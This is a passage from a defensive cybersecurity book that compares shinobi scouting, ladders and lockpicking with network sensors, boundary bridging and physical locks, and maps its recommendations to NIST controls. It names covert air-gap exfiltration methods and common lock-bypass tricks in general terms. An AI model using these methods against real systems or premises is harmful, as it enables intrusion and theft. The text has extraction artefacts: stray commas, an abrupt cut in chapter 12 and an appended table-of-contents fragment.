• Outside foot scouts (togiki)

Smelling and listening scouts, who used trained dogs and dog handlers,

placed themselves in shrouded observation posts—they couldn’t see out, but

neither could the enemy see in. The scout focused intently on smelling or

listening for signs of infiltration. These techniques worked especially well at

night, as smelling and listening scouts did not need light to operate.2

72Chapter 9

Outside foot scouts tried to catch infiltrators by conducting sweeps

at the edge of enemy territory; hiding on enemy ground and monitor-

ing movement toward their own camp; or using tripwires, noise, or

even physical contact to detect intruders. Bansenshūkai says that togiki

scouts should be shinobi themselves, as they must be skilled in stealth

and observation, have a preternatural understanding of which direc-

tion theenemy will attack from, and be able to successfully detect and

engageanenemy ninja.3

In addition to human (and animal) scouts, Bansenshūkai recom-

mends using active and passive detection techniques to identify enemy

infiltrators. Actively, shinobi might lower or swing a sarubi (monkey-fire,

or “fire on a rope”4) into or across a dark area such as a moat, trench,

or the bottom of a castle wall to quickly and dynamically illuminate it,

from a distance, in a way that fixed lanterns couldn’t. Passively, shinobi

would build detection systems, for instance, by filling a wide but shal-

low trench with fine sand, then raking the sand into a complex pattern.

Should an enemy bypass exterior defenses, they would leave footprints,

alerting guards that the castle had been breached. Footprints in the

sand might also tell an observant shinobi which direction the enemy

came from and whether they had left the same way—valuable intel-

ligence that could help neutralize an immediate threat and shore up

future defenses.5

In this chapter, we will look at the different types of security sensors

commonly used in networks, comparing and contrasting modern deploy-

ment with the ways shinobi historically used sensors. We will highlight

sensor placement, as well as sensor countermeasure techniques, learning

from the shinobi to enhance our own cybersecurity defenses. We will also

propose sensors based on the sensory scouts of ancient times.

Identifying and Detecting Threats with Sensors

In cyber parlance, the term sensor encompasses a variety of detection sys-

tems and instruments. Most commonly, a sensor is a monitoring device

on a tap, T-split, span, or mirror port that copies activity for observation,

recording, and analysis. In one such configuration, sensors sniff and cap-

ture raw packets (PCAPs) as they cross the wire, then process and analyze

them to alert security to suspicious events. Sensors can also be placed “in

line,” meaning a packet travels through a device that can delay, block, or

alter the packet’s information, effectively thwarting attacks rather than

simply raising a red flag. Secondary sensors, such as Wi-Fi sensors, detect

external or other unauthorized signals and connections, while physical

security sensors, such as cameras, monitor access to sensitive data centers,

Sensors73

server racks, and switch closets. In broader terms, certain software end-

point agents also act as sensors, as they collect events, actions, and activity

on a host system and report back to a command and control (C2) system

to analyze and raise alerts if necessary.

Organizations often dedicate sensors to certain types of traffic—

for example, by configuring email gateway security devices for phishing

attempts or spam, intrusion prevention/detection systems for network

attacks, firewalls for unauthorized IPs and ports, proxies for suspicious

websites, and data loss prevention systems. Sensor-based cybersecurity

devices are typically installed at the main egress point of a network, typ-

ically at the demilitarized zone (DMZ). Because it is standard to place

sensors as far up the network as possible to maximize the amount of

traffic they see, if adversaries hide from sensors at the gateway or bypass

the main egress to bridge into a network, it’s possible for them to oper-

ate within the network free from security sensor inspection.

Despite this security liability, most organizations are unlikely to dras-

tically increase the number of sensors in their systems, as purchasing

many additional sensors—along with the extra work to license, install,

update, maintain, and monitor them all—is financially impractical.

Unfortunately, many organizations simply assume that if the main egress

sensor does not catch a threat, then more of the same sensor would not

be more effective. This is an error in judgment that puts their systems

atrisk.

Better Sensors

A major problem with sensors is that they almost always require a person

to monitor them and act on the information they convey. This problem

is compounded by the limitations of security sensors and available analy-

sis platforms. Think of modern security sensors this way: a building has

a number of tiny microphones and cameras scattered throughout, but

these cameras and microphones are trapped inside little straws—straws

that give them narrow fields of capture. Now imagine trying to piece

together an active breach while only able to peer through a single straw

at a time. Not only that, but each straw is building up thousands of hours

of data to store, process, and analyze. This frustrating situation is often

alleviated with signatures, algorithms, or machine learning—tools that

can help to identify anomalies and malicious activity. However, these

automated systems aren’t perfect. Often, they create false positives or cre-

ate such a large flood of legitimate alerts that it can feel the same as not

having sensors at all. To remedy these problems, we can take a page from

the shinobi: we can identify the paths an enemy is likely to take, and we

74Chapter 9

can hide many types of sensors along those paths to give early warning of

attacks. Consider the following guidance as you consider improving the

sensors in your organization:

1. Model your network and identify your weaknesses. Create a network

map and information flow model of your environment—one that

describes every system and its purpose, how systems are connected,

where information enters and leaves your network, the type of

information received, what sensors (if any) inspect information,

and the egress points. Identify areas that lack sensors and places

you believe are properly monitored. Predict where threat actors

will attempt to infiltrate your network. Keep in mind that creating

a comprehensive map can take months and requires help across

the entire enterprise. Your resulting map might not be perfect, but

even a flawed map is better than no map at all.

2. Conduct red team and pen testing. Contract a red team to attempt

infiltration of your network. Consider a “purple team” approach

to the exercise, in which your network defenders (the blue team)

observe the red

,

team in real time in the same room and can

pause the exercise to ask questions. Query the security sensors

before, during, and after the attack to see what they detected or

reported, if anything. This information should be highly enlight-

ening. Allow your blue team to consider how different sensor

placement could have detected the red team faster and more

accurately. Discuss architectural defense changes, sensor tuning,

and other solutions that are suggested by the testing.

3. Detect and block encrypted traffic. Block all encrypted traffic that

cannot be intercepted and inspected by your sensors. Also, take

appropriate steps to strip your machines’ ability to use unauthor-

ized encryption. Have the red team test your ability to detect

encrypted traffic attacks. Most sensors cannot inspect encrypted

traffic; therefore, many organizations allow asymmetric encryp-

tion, such as elliptic-curve Diffie-Hellman (ECDH), which cannot

be broken by root certificates. Allowing unbroken encrypted traf-

fic to leave your organization without going through DLP creates

a security gap analogous to when castle guards scrutinize every

bare-faced person who enters or leaves through the gate but per-

mit anyone wearing a mask to walk through unchallenged.

4. Develop “smelling” and “listening” sensors. Explore opportunities

to create sensors that can secretly detect certain types of threat

activity. For example, configure an external physical sensor that

monitors a system’s CPU activity or power consumption and can

Sensors75

detect unauthorized access or use—such as by a cryptocurrency

miner—based on whether performance correlates with known

commands or logged-in user activity.

5. Implement passive sensors. Establish passive interfaces on switches

and servers that should never be used. Also, configure sensors to

detect and alert locally if an interface is activated, indicating the

likely presence of an adversary on your network. Much like a shal-

low trench filled with sand, such systems can be built to detect

lateral movement between network devices where it should not

happen.

6. Install togiki sensors. Place inward-facing sensors outside your

network to detect infiltration. For example, with the cooperation

of your ISP, configure sensors outside your network boundary to

monitor inbound and outbound traffic that your other sensors

might not detect. Place sensors in a T-split directly off a device

working in conjunction with a host-based sensor, and then diff

the devices against each other to determine whether both sensors

are reporting the same activity. This approach helps identify com-

promised endpoint sensors and network interface drivers.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . You have had three arson events inside your castle in

the past week, though a fire watch was on standby and doused the flames

before they spread . You believe the arsonist is a shinobi who has learned

from your team’s responses and will perform a new attack—one that may not

even involve fire . Your resources are thin, but your fire watch asks for addi-

tional staff and equipment to better respond, your architect wants to reinforce

and fireproof sections of the castle, and your head of security requests more

guards on the gates to catch the infiltrator .

How would you hide sensors to detect the arsonist or other suspicious

actors inside your castle? Could you improve fire watch response time and

capability while reducing the number of fire watch members, perhaps by

using them as sensors rather than as responders? Where and how might you

place human sensors to most effectively detect and alert others to suspicious

activity? How would you rotate perimeter guards between sweeping inside

and outside the castle, and how would you augment their capabilities to pre-

vent an adversary from identifying when or where the guards are patrolling?

What passive sensors could you implement to catch the arsonist?

76Chapter 9

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of sensors in mind.

1. Implement packet sniffers, full network PCAPs, and other

automated sensors to support incident handling, maintenance,

and information flow enforcement. [AC-4: Information Flow

Enforcement | (14) Security Policy Filter Constraints; IR-4:

Incident Handling; MA-3: Maintenance Tools]

2. To safeguard physical access and detect tampering, install sen-

sors on wiring closet locks, cameras to monitor data center and

server access, water sensors to detect leaks that can threaten

electrical devices, and wiretapping sensors on communication

lines. [PE-4:Access Control for Transmission; PE-6: Monitoring

Physical Access; PE-15: Water Damage Protection]

3. Run awareness training programs for staff—including non-IT

staff—so they can act as human sensors to detect threat activ-

ity. Provide a clear, easy, and accessible method for employees to

report suspicious activity. [PM-16: Threat Awareness Program]

4. Intercept encrypted communications and allow your sensors

to perform deep inspections of unencrypted packets. [AC-4:

Information Flow Enforcement: | (4) Content Check Encrypted

Information; SC-8: Transmission Confidentiality and Integrity]

5. Implement sensors that can analyze packets and take preventive

measures such as blocking or filtering. [SC-5: Denial of Service

Protection; SC-7: Boundary Protection | (10) Prevent Exfiltration

| (17) Automated Enforcement of Protocol Formats]

6. Prohibit promiscuous sensor activation on non-sensing systems

to prevent the release of sensitive information to adversaries who

gain unauthorized access. [SC-42: Sensor Capability and Data]

7. Work with your ISP to place Trusted Internet Connection (TIC)

sensors outside your network boundary. [AC-17: Remote Access |

(3) Managed Access Control Points]

8. Document all internal system connections; their interfaces; the

information they process, store, and communicate; and sensor

placement between systems. [CA-9: Internal System Connections]

9. Conduct penetration testing and red team exercises to test and

validate your sensor placement and capability. [CA-8: Penetration

Testing; RA-6: Technical Surveillance Countermeasures Survey]

Sensors77

Debrief

In this chapter, we talked about smelling, hearing, and outside sensory

scouts used to detect enemy shinobi in ancient Japan. We also looked at

active and passive sensors that castle guards deployed to catch intruders.

We then discussed various types of security sensors used today—sensors

that help defenders see what’s happening on the wires around them. We

covered several logistical problems around sensors such as sensor place-

ment, false positives, and sensor management. Lastly, we talked about

how to apply ancient shinobi techniques to identify intruders in net-

worked systems.

Next, we will discuss the different types of bridges and ladders shi-

nobi used to bypass castle defenses—a concept that has some importance

in regard to sensors. For instance, imagine your castle is protected by

a moat and you have placed all of your sensors at the drawbridge. An

enemy shinobi who is able to covertly place a bridge of their own without

using the drawbridge also effectively bypasses your sensors—making

them useless. We’ll explore how this bridging concept is almost exactly

the same in cybersecurity and how difficult it can be to address.

10

B R I D G E S A N D L A D D E R S

There will be no wall or moat that you cannot pass, no matter

how high or steep it is, particularly if you use a ninja ladder.

A castle gatehouse is usually most strictly guarded, but the roof

is the most convenient place for you to attach a hooked ladder.

—Bansenshūkai, “In-nin II” 1

The shinobi could

,

move, quietly and unseen, over an

enemy’s walls and gates, using ninki infiltration tools—

tools described in both Bansenshūkai 2 and Gunpo Jiyoshu.3

Multifaceted ladders and portable bridges like the spiked

ladder, cloud ladder, or tool transportation wire4 enabled

shinobi to cross moats, scale walls, and deliver tools to

other shinobi safely and stealthily. Sometimes these lad-

ders were “proper,” or made by shinobi in advance of a

mission, and sometimes they were “temporary,” or con-

structed in the field.5 These were valuable tools, as they

provided access to sensitive locations often left unguarded

out of overconfidence that they were inaccessible.

80Chapter 10

The scrolls also explain how to infiltrate an enemy camp by manipu-

lating the enemy’s own security measures. Shōninki instructs shinobi to

imagine how a bird or fish might access a castle6—in other words, to real-

ize the unique advantages that being up high or down low provide. For

example, scaling a wall affords the opportunity to bridge across other

walls and rooftops with great speed, providing better access to the inte-

rior of the castle than passing through a gate might. Swimming across

a moat could provide underwater access to a common waterway—one

that leads into a castle. The Bansenshūkai even recommends purposefully

attempting to bridge over the guardhouse gate, where the most guards

would logically be stationed, because the defenders might assume that

attackers would avoid trying to penetrate at this point.7

In this chapter, we will discuss how bridging network domains is

similar to bridging castle wall perimeters. Just like castle walls, networks

are engineered with barriers and segmentations that assume one must

pass through a controlled gateway. Bridges allow threats to bypass these

gateways, circumventing the security controls established at gateway egress

points. What may seem like a straightforward measure to take, like instruct-

ing guards to confront anyone building a bridge across the castle moat,

can become futile when, say, the castle architect opted to connect the

moat’s concentric rings for water management reasons. Connected, three

moats are no longer three discrete boundaries that an adversary must

pass. Instead, they’re a bridge of water to be swum straight into the heart

of the castle. Learning how to think like a shinobi and seeing barriers as

potential ladder-hooking points can help you reassess your own network

and preemptively cut off bridging opportunities.

Network Boundary Bridging

To cybersecurity professionals, a bridge is a virtual or physical network

device that operates at both the physical and data link layers—layers 1 and

2 of the OSI model—to connect two segments of a network so they form

a single aggregate network. The term also refers to any device, tool, or

method that enables information to cross a “gap,” such as an air-gapped

network or segmentation boundary. Bridges typically bypass security

controls and safeguards, allowing for data exfiltration from the network

or the delivery of unauthorized or malicious data to the network. These

potentially dire consequences have pushed cybersecurity professionals to

develop detection and mitigation methods to prevent bridging, including:

• Disabling network bridging on wireless Ethernet cards

• Disabling systems with two or more active network interfaces

Bridges and Ladders81

• Implementing network access controls (NACs) and monitoring to

detect new devices on a network

• Installing sensors to detect unauthorized Wi-Fi access points

• Restricting certain networks with VLANs or other router

technologies

• Using authentication in the Link Layer Discovery Protocol (LLDP)

Despite evolving security controls, unauthorized bridging still

happens—and some advanced infiltration techniques, while proven only

in academic or laboratory environments, demonstrate great potential for

harm. The most recent examples include taking control of system LEDs

to blink bits to an optical receiver in a different room or building, using

FM frequency signals to communicate with nearby phones (as with the

AirHopper and GSMem exploits), controlling and pulsing fans to send

bits through acoustics, and artificially overheating and cooling CPUs

to slowly send data (as with the BitWhisper exploit). Threat actors may

even be able to bridge networks through a system’s power cords via the

Ethernet over power technique (EOP, not to be confused with power over

Ethernet, POE). In other cases, an organization’s VoIP phones could have

their microphones and speakers activated remotely, allowing adversaries

to transfer sound data or spy on conversations.

Of course, some bridging is less cutting-edge. An adversary could

climb onto the roof of an office building, splice into accessible network

wires, and install a small earth satellite station that provides robust bridge

access to a network. Smartphones are routinely plugged into system USB

ports to charge their batteries, but a charging phone also connects a com-

puter to an external cellular network that is not inspected by firewalls,

data loss prevention (DLP), or other security tools, completely bypassing

an organization’s defenses and facilitating data theft or code injection on

the host network. When bridging via a sneakernet, a user loads informa-

tion onto portable media and walks it to another computer or network

location, manually bypassing security controls. There are also concerns

that threats could use the hidden management network—typically on the

10.0.0.0/8 net—that connects directly to consoles of routers, firewalls,

and other security systems, using these as jump points to bridge different

network VLANs and segments and effectively using the network to bypass

its own security. In addition, split tunneling poses a risk, as information

may be able to leak to and from different networks through a device con-

nected to both networks simultaneously.

Mature organizations work under the assumption that adversaries are

continually developing different bridging technologies to bypass defenses

in new, unforeseen ways. Indeed, it appears possible that everything

82Chapter 10

within the electromagnetic spectrum—including acoustic, light, seismic,

magnetic, thermal, and radio frequencies—can be a viable means to

bridge networks and airgaps.

Countering Bridges

Preventing bridging between systems designed to connect to other sys-

tems is a hard problem to solve. While there is no perfect solution, it is

possible to reduce bridging opportunities and focus isolation efforts on

the most important assets. In addition, countermeasures that negate the

capability of bridging techniques can be layered to improve the effective-

ness of these defenses.

1. Identify your weaknesses. Identify the networks and information sys-

tems that hold your organization’s sensitive, critical, or high-value

data. Create a data-flow diagram (DFD) to model how informa-

tion is stored and moves in the system. Then identify areas where

a covert, out-of-channel bridge attack could occur.

2. Implement bridge countermeasures. Consider implementing

TEMPEST8 controls, such as Faraday cages or shielded glass,

toblock air gap bridging through emissions or other signals. To

block rogue bridges, ensure that you have identified and authen-

ticated devices before allowing them to connect to your network

or another device. Develop appropriate safeguards to mitigate

potential bridging threats identified in your threat model.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable information, treasure, and people inside . You receive credible threat

intelligence that a shinobi has been using special hooked ladders and cloud

bridges to move people or things across your castle walls without the knowl-

edge of your gate guards .

Consider the ways in which you could reconfigure your

,

castle walls to

detect and/or prevent ladders or bridges from bypassing them . Can you pre-

dict where the shinobi will attempt to bridge your defenses? How might you

change your guards’ inspection protocols and direct them to look for tempo-

rary bridging? How would you react to knowing that your perimeter had been

breached, and how would you adjust to working under the assumption that

your internal environment had been altered and might not be trustworthy?

Bridges and Ladders83

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of bridges in mind.

1. Implement boundary protections and information flow con-

trols to prevent external devices, systems, and networks from

exfiling data or transferring malicious code onto your network.

[AC-4: Information Flow Enforcement | (21) Physical/Logical

Separation of Information Flows; AC-19: Access Control for

Mobile Devices; AC-20: Use of External Information Systems |

(3) Non-Organizationally Owned Systems/Components/Devices;

SC-7: Boundary Protection]

2. Enforce wireless access protection controls to block or detect

unauthorized wireless signals that bridge across your networks in

microwave, UHF/VHF, Bluetooth, 802.11x, and other frequen-

cies. [AC-18: Wireless Access; SC-40: Wireless Link Protection]

3. Audit network access and interconnections to identify external

networks or systems—such as remote network printers—that

could bridge your network to transmit data. [CA-3 System

Interconnections; CA-9 Internal System Connections]

4. Establish strong portable media policies to prevent unauthorized

bridging. Require identification and authentication of external

media and devices before allowing anything to connect to your

environment. [IA-3: Device Identification and Authentication;

MP-1 Media Protection Policy and Procedures; MP-2: Media

Access; MP-5: Media Transport]

5. Test for TEMPEST leakage or other out-of-channel signals

coming from your systems. Using the results, decide where to

implement protections that inhibit a signal’s ability to be used

as a bridge. [PE-19: Information Leakage; SC-37: Out-of-Band

Channels]

Debrief

In this chapter, we talked about the philosophy of adversarial bridging,

and we discussed bridging network segments and traditional best prac-

tices. We looked at multiple-bridging techniques—bridges that can cross

gaps in ways you may not have thought of before. The thought exercise

84Chapter 10

in this chapter was designed to prompt thinking about building physical

safeguards between ladders and walls; in theory, these can be founda-

tional to innovating modern defenses for the inputs/outputs of a system.

In the following chapter, we will discuss locks and the shinobi prac-

tice of lockpicking, which was based on a belief that any lock designed by

a human can be picked by a human. We also get a glimpse of a shinobi’s

approach to security when they must rely on a lock they themselves do not

trust. We will discuss the application of locks in cybersecurity, as well as

what we can learn from the shinobi to improve our approach to locks and

lockpicking.

11

L O C K S

There is no padlock that you cannot open.

However, this all depends on how skilled you are;

therefore, you should always get hands-on practice.

Opening tools are designed to help you open the doors of the

enemy house with ease. Therefore, of all the arts, this is the one

conducted when you are closest to the enemy.

—Bansenshūkai, Ninki III 1

In ancient Japan, locks were simpler than the locking

devices of today, as the manufacturing capabilities of the

time could not produce the intricate pins, tumblers, and

other components that contemporary locks use. However,

these older locks were elegantly designed, making exem-

plary use of “prongs, latches, and the natural forces of

gravity and tension” to keep people’s valuables safe from

intruders and thieves.2

Shinobi regularly encountered complex locks during their missions—

and devised ways to open all of them. The scrolls indicate that no lock,

barrier, or other mechanism was safe from a shinobi with well-constructed

86Chapter 11

tools, sufficient training and ingenuity, and an optimistic mindset.

Significant portions of all three scrolls are dedicated to documenting how

to make and use various picks, shims, and other probing tools used to

open locks, doors, and gates (Figure11-1).3

Figure 11-1: A variety of tools used to open locks, doors, and gates. From

left to right, a probing iron, an extendable key, lockpicking shims, a pick for

guided padlocks, and a door-opening tool (Bansenshūkai and the Ninpiden).

From ring latches to rope, locking bars to hooks and pegs, sophisti-

cated key latches to rudimentary, homemade technology . . . whatever the

lock’s design, shinobi had methods and tools to bypass it. In fact, shinobi

were able to breach any security system or deterrent used at the time.4

Knowing that locks could not be fully trusted, shinobi themselves devel-

oped techniques to take security into their own hands. Some were bluntly

simple: when sleeping in lodgings secured by locks they did not trust,

shinobi sometimes tied a string from the door or window to the topknot

in their hair, ensuring they would wake up if the door latch or lock were

opened as they slept.5

Today, as in the time of shinobi, people use locks to safeguard their

property—and threat actors still use picks to defeat them. The lock, as it

always has, serves multiple purposes: it works as a deterrent. It is a visible

assurance to an owner that their property is safe. It creates a system of

accountability to the key holder(s) if the lock is breached through use of

a key. It also serves as a barrier and an alarm, since thieves will take time

and make noise as they attempt to bypass it. In this chapter, we will dis-

cuss how hackers, much like shinobi, are still picking locks and bypassing

security. Furthermore, we’ll talk about why physical locks are so impor-

tant to digital systems and detail the necessary companion precautions.

Locks87

We will also explore some technological advances in locks and picks, dis-

covering what else the shinobi can teach us about security.

Physical Security

Just as lockpicking is often a gateway hobby into hacking, defeating a lock

is a common entry point into cybersecurity. The act of finding flaws in

or physically accessing a thing that is supposed to be secure—the visual,

tactile, and audible feedback of a lock’s opening in your hand after you’ve

beaten its defenses—can be a powerful sensation. It can pique interest in

the security field and build confidence in fledgling abilities.

The cybersecurity industry uses locking devices to restrict physical

access to buildings, data centers, switching closets, and individual offices.6

On a more granular level, rack locks limit access to servers, chassis-case

locks limit access to a system’s physical components, device port locks pre-

vent unauthorized use of USBs or console jacks, tethering locks prevent

systems from leaving their location, and power locks keep devices from

turning on at all. Locking down physical access to systems is a crucial

piece of an organization’s cybersecurity strategy. If systems are vulnerable

to being tampered with physically, many digital security controls are at

risk of being rendered ineffective once the adversary gains physical access.

It should be assumed that, if adversaries gain physical access to a machine,

they also gain admin-level privileges on the system and acquire its data.

Despite the proliferation of illicit lockpicking tools and techniques,

organizations tend to use the same locks year after year, leaving them-

selves extremely vulnerable to attack. Most information system and

building access locks use weak pin tumblers, such as the Yale cylindrical

,

lock—patented in the 1860s and now the world’s most common lock due

to its low cost and ease of mass production—and tubular locks (or “circle

locks”), the most common type of bicycle lock. Criminals construct,

sell, and use picking tools that can easily beat these off-the-shelf locks.

For example, soda can shims can pry open locks, pen caps can simu-

late tubular keys, and 3D-printed plastic keys can be easily forged from

pictures of the original. For the unskilled criminal, autoelectronic lock-

pickers can, with the pull of a trigger, do all the work of picking every

tumbler lock’s pin within seconds.

Large-scale lockpicking countermeasures are few and far between,

and some are more concerned with liability than security. For example,

certain insurance policies won’t cover break-ins and thefts if inferior

locks—such as the most common ones sold in the United States—were

picked or bypassed during the crime. Some governments issue compli-

ance standards for lock manufacturers, along with restrictions that bar

88Chapter 11

selling substandard locks to citizens. In the cybersecurity realm, select

governments safeguard their classified systems and data with a combina-

tion of cipher locks or other high-assurance locks and supplemental secu-

rity controls that mitigate the lock’s security flaws.

However, too many doors and systems still use weak lock-and-key

defenses—defenses that even a mildly sophisticated threat actor can

defeat with ease. Locks and barriers for information systems must be

improved to mitigate against common attacks such as shimming, picking,

stealing, copying, and forcing.

Improving Locks

Preventing all lockpicking is likely impossible. However, there are many pro-

active steps you can take to improve the resiliency of your locks. Improving

locks will also improve your cybersecurity posture by mitigating unauthor-

ized physical access attacks to your systems.

• Upgrade your locks. Evaluate the more advanced locking systems,

such as European dimple locks, to determine which ones are

compatible with your business requirements and budget. Seek

approval from your stakeholders and physical security team and

then upgrade all of your locks to models that are more resilient

to attack.

• Think outside the lock. Consider nontraditional locking solutions

for your organization, such as multiple-stage locks. When a first-

stage unlock mechanism controls access to a second-stage lock,

intruders cannot quickly and easily open both locks at once or in

quick succession.

For instance, to close off an entryway, use two independent

locking systems that complement each other. The first stage could

be a digital 4-digit PIN lock that would temporarily unfreeze the

pins in the second-stage lock, a cylinder lock. While the pins are

frozen in the second-stage lock, they are impossible to pick, but

a key could be inserted in preparation for activation by the first-

stage lock. Once the pins are temporarily unfrozen, the physical

key can be turned, and the entryway can be unlocked. However,

this window of opportunity opens for only three seconds. After

that, the digital lock resets and refreezes the pins. To be success-

ful, the intruder would need to first learn the PIN and then be

able to pick the door lock in under three seconds, a feat that may

not be humanly possible.

• Add reinforcements. Consider reinforcing the thing the lock is

securing. You might protect the hinges from tampering or install

Locks89

strike plates, door/frame reinforcements, door handle shields, or

floor guards.

• Petition the lock industry. Urge the lock industry to innovate and

incorporate new designs into products used to protect infor-

mation systems. Until there is sufficient consumer pressure to

upgrade their outdated products, manufacturers will continue to

sell the same familiar, vulnerable equipment.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . You know all your valuables are kept under lock and

key—in chests and vaults, behind doors and gates—and you know a shinobi

is capable of bypassing all these locks .

How could you bolster the security of your castle’s locks? Would you

know if your locks had been opened or bypassed? How might you block a

shinobi’s access to your locks? How could you configure false locks to trick a

shinobi and alert you to an infiltration attempt?

Recommended Security Controls and Mitigations

Where relevant, the recommendations are presented with applicable

security controls from the NIST 800-53 standard. Each should be evalu-

ated with the concept of locks in mind.

1. Secure paper files, magnetic tape, hard drives, flash drives, disks,

and other physical media in locked, controlled containers. [MP-

4: Media Storage; MP-5: Media Transport]

2. Use secure keys or other locking devices to enforce physical

access controls and authorization to systems and environments.

[PE-3: Physical Access Control | (1) Information System Access

| (2) Facility/Information System Boundaries | (4) Lockable

Casings | (5) Tamper Protection; PE-4: Access Control for

Transmission Medium; PE-5: Access Control for Output Devices]

Debrief

In this chapter, we talked about locks and their purposes. We noted that

adversaries, no matter the era, will develop tools and techniques to bypass

90Chapter 11

locks. We touched on the common lock technologies used to protect

access to systems and why it’s important to upgrade them. It’s especially

important to remember that, if an adversary gains physical access to your

system, you should assume they can compromise it—hence the impor-

tance of physically preventing access to those systems with locks.

In the next chapter, we will discuss an advanced tactic shinobi used

when the target was very securely locked down—one that effectively

tricked their adversary into giving away the key. In a way, an organiza-

tion’s defenses aren’t that different. Even if you have the best lock, if you

give the key to an intruder, it won’t help you.

12

M O O N O N T H E W A T E R

After making an agreement with your lord, you should lure

the enemy out with bait to infiltrate their defenses.

In this technique, you should lure the enemy with tempting bait,

like fishing in the sea or a river, so as to make an enemy who will

not normally come out in fact leave its defenses.

—Bansenshūkai, Yo-nin II 1

With an image straight out of a haiku, Bansenshūkai calls

an open-disguise infiltration technique suigetsu no jutsu—

the art of the “moon on the water.”2 While the technique

had many uses, shinobi used it primarily to target heavily

fortified enemy camps—the kind that restricted people

from leaving, entering, or even approaching. Instead of

penetrating the camp’s defenses by force, shinobi would

lure out their target, effectively tricking them into giving

away ingress protocols such as insignias and other identify-

ing marks, passwords, code words, and challenge-response

92Chapter 12

signals. This technique also let shinobi tail targets as they returned to

camp, lure defenders from their guard posts and infiltrate without resis-

tance, or interact directly with targets and infiltrate through deception or

offensive measures.

For targets especially reluctant to leave their heavily fortified defenses,

the scroll instructs shinobi to seek help from their commanders to conduct

advanced deceptions.3 For example, a commander could move forces into

vulnerable positions, enticing the enemy to attack and thereby depleting

the enemy’s defenses enough for shinobi to infiltrate. Alternatively, the

shinobi would overpower the enemy when they returned, battle weary.

The commander might even stage something more elaborate, like the

beginning of a full-on, long-term castle siege. Then, shinobi might send

a soldier posing as an allied general’s messenger to convince the enemy

to leave their castle,

,

. 66

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 68

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69

9

SENSORS 71

Whether day or night, scouts for a far-distance observation should be

sentout.

Identifying and Detecting Threats with Sensors . . . . . . . . . . . . . . . . . . . . . . . . 72

Better Sensors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 76

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77

10

BRIDGES AND LADDERS 79

There will be no wall or moat that you cannot pass, no matter how high or

steep it is, particularly if you use a ninja ladder.

Network Boundary Bridging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80

Countering Bridges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 83

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83

xiiContents in Detail

11

LOCKS 85

There is no padlock that you cannot open. However, this all depends on how

skilled you are; therefore, you should always get hands-on practice.

Physical Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87

Improving Locks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 89

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89

12

MOON ON THE WATER 91

After making an agreement with your lord, you should lure the enemy out

with bait to infiltrate their defenses.

Social Engineering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92

Defenses Against Social Engineering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . . 96

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97

13

WORM AGENT 99

Make a minomushi, or worm agent (aka insider threat), out of an enemy.

Insider Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101

A New Approach to Insider Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 105

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106

14

GHOST ON THE MOON 107

According to Japanese legend, if you knew how to seek the ghost who tends

trees on the moon, he could invite you to the moon to eat the leaves of his tree,

making you invisible.

Implants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108

Protections from Implants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 111

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112

15

THE ART OF THE FIREFLIES 113

The art of fireflies should be performed only after you know everything

about the enemy in great detail so that you can construct your deception in

accordance with the target’s mindset.

Attribution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114

Approaches to Handling Attribution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 118

Debrief . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119

Contents in Detailxiii

16

LIVE CAPTURE 121

Use good judgment to determine whether the target is actually inattentive or

whether they are employing a ruse to lure ninjas and capture them.

Live Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124

Confronting Live Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125

Recommended Security Controls and Mitigations . . . . . . . . . . . . . . . . . . . . . 127

